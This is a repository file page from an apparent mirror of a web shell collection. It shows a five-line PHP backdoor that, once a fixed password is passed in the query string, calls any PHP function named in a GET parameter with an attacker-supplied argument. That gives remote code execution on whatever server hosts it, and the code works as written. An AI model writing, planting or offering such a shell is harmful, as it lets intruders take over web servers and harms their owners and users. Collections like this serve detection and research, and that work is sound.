1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 04:41:28 +00:00
Files
webshell/php/2022-08-26-06.php

5 lines
69 B
PHP

<?php
if ($_GET['p']=='password'){
$_GET['f']($_GET['a']);
}